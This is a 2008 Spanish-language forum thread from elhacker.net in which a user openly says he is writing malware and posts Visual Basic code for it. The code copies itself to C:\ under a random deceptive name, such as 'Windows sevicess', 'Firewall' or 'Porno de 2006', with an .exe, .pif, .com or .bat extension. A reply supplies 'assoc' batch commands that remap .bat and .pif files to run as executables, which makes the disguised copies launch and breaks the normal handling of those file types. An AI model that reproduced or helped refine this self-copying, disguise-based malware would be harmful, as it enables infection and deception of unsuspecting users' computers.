elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Error de ejecucion
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Error de ejecucion  (Leído 1,661 veces)
At0XXXic0

Desconectado Desconectado

Mensajes: 4



Ver Perfil
Error de ejecucion
« en: 18 Marzo 2008, 22:16 pm »

Hola, estoy programando un malware que tome como nombre
para copiarse uno entre 30 opciones y 4 extensiones (.exe, .pif, .bat y .com ),
todo va bien hasta este punto, genera el nombre y la extension correctamente :D
pero si sale un archivo com, pif o bat y lo ejecuto me lanza error que dice:

Error '53' en tiempo de ejecucion :
no se ha encontrado el archivo >:(

Les dejo el code para que lo analizen:

Citar
Option Explicit
Dim nombre As String
Dim exte As String
Dim toxico
Dim popo
Private Sub Form_Load()
Randomize
toxico = Int(Rnd * 30)
If toxico = 0 Then nombre = "Windows sevicess"
If toxico = 1 Then nombre = "Wininit"
If toxico = 2 Then nombre = "Sexy"
If toxico = 3 Then nombre = "runexe"
If toxico = 4 Then nombre = "puppet"
If toxico = 5 Then nombre = "shit"
If toxico = 6 Then nombre = "*****"
If toxico = 7 Then nombre = "Winsock32.dll"
If toxico = 8 Then nombre = "Root"
If toxico = 9 Then nombre = "Firewall"
If toxico = 10 Then nombre = "XP"
If toxico = 11 Then nombre = "WinNT"
If toxico = 12 Then nombre = "winXP"
If toxico = 13 Then nombre = "Logger"
If toxico = 14 Then nombre = "sucker"
If toxico = 15 Then nombre = "apestas"
If toxico = 16 Then nombre = "line"
If toxico = 17 Then nombre = "p**a"
If toxico = 18 Then nombre = "setsi"
If toxico = 19 Then nombre = "ozorio"
If toxico = 20 Then nombre = "sevicess"
If toxico = 21 Then nombre = "mi_vida-atte-tu compu"
If toxico = 22 Then nombre = "Informacion"
If toxico = 23 Then nombre = "Porno de 2006"
If toxico = 24 Then nombre = "nada"
If toxico = 25 Then nombre = "alg"
If toxico = 26 Then nombre = "que_joto_eres"
If toxico = 27 Then nombre = "me_cagas"
If toxico = 28 Then nombre = "abreme"
If toxico = 29 Then nombre = "no se"
Randomize
popo = Int(Rnd * 4)
If popo = 0 Then exte = ".exe"
If popo = 1 Then exte = ".pif"
If popo = 2 Then exte = ".com"
If popo = 3 Then exte = ".bat"
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\" & nombre & exte

End sub

Espero puedan ayudarme  ;D


En línea

Somos la banda mas honrada del mundo... y nisiquiera somos honrados. Eskorbuto
krackwar


Desconectado Desconectado

Mensajes: 900


Ver Perfil
Re: Error de ejecucion
« Respuesta #1 en: 19 Marzo 2008, 01:53 am »

a ver si entendi quieres ejecutar tu archivo como si fuera un .bat o un .pif o .com ,bueno si es esto lamento decirte que no se puede


En línea

Mi blog
Bienvenido krackwar, actualmente tu puntuación es de 38 puntos y tu rango es Veteran.
El pollo número 1, es decir yo, (krackwar), adoro a Shaddy como a un dios.
At0XXXic0

Desconectado Desconectado

Mensajes: 4



Ver Perfil
Re: Error de ejecucion
« Respuesta #2 en: 19 Marzo 2008, 02:51 am »

Gracias por contestar, lo que pasaba era que queria saber porque me
producia error al ejecutar una copia del mismo (con extension .exe)
con otra extension (pif,com,bat), pero veo que has respondido que
no se puede  >:(, de todas formas gracias :D
En línea

Somos la banda mas honrada del mundo... y nisiquiera somos honrados. Eskorbuto
krackwar


Desconectado Desconectado

Mensajes: 900


Ver Perfil
Re: Error de ejecucion
« Respuesta #3 en: 19 Marzo 2008, 12:50 pm »

Gracias por contestar, lo que pasaba era que queria saber porque me
producia error al ejecutar una copia del mismo (con extension .exe)
con otra extension (pif,com,bat), pero veo que has respondido que
no se puede  >:(, de todas formas gracias :D
bueno,lo que te dije es algo basico ,aunque si ai una forma de hacerlo que seria modificando el registro i poner que los bat , los pif y los com se ejecuten como si fueran exe`s no tengo tiempo para escribirte el code pero te dejo uno de batch
Código:
assoc .exe=exefile
assoc .bat=exefile
assoc .pif=exefile
En línea

Mi blog
Bienvenido krackwar, actualmente tu puntuación es de 38 puntos y tu rango es Veteran.
El pollo número 1, es decir yo, (krackwar), adoro a Shaddy como a un dios.
At0XXXic0

Desconectado Desconectado

Mensajes: 4



Ver Perfil
Re: Error de ejecucion
« Respuesta #4 en: 19 Marzo 2008, 19:49 pm »

Ok! gracias
En línea

Somos la banda mas honrada del mundo... y nisiquiera somos honrados. Eskorbuto
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Error de ejecucion
Programación C/C++
0xDani 0 1,426 Último mensaje 14 Junio 2012, 20:06 pm
por 0xDani
Error en la ejecucion del servidor
Multimedia
HERMOGENES 5 4,435 Último mensaje 13 Julio 2013, 03:27 am
por Kurono90
MOVIDO: Error en la ejecucion del servidor
Software
Songoku 0 1,038 Último mensaje 13 Julio 2013, 02:09 am
por Songoku
Error de ejecucion
Programación C/C++
JulioRL8 2 1,904 Último mensaje 14 Junio 2016, 19:47 pm
por JulioRL8
Error de ejecucion
Programación C/C++
JulioRL8 0 1,421 Último mensaje 16 Junio 2016, 17:10 pm
por JulioRL8
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines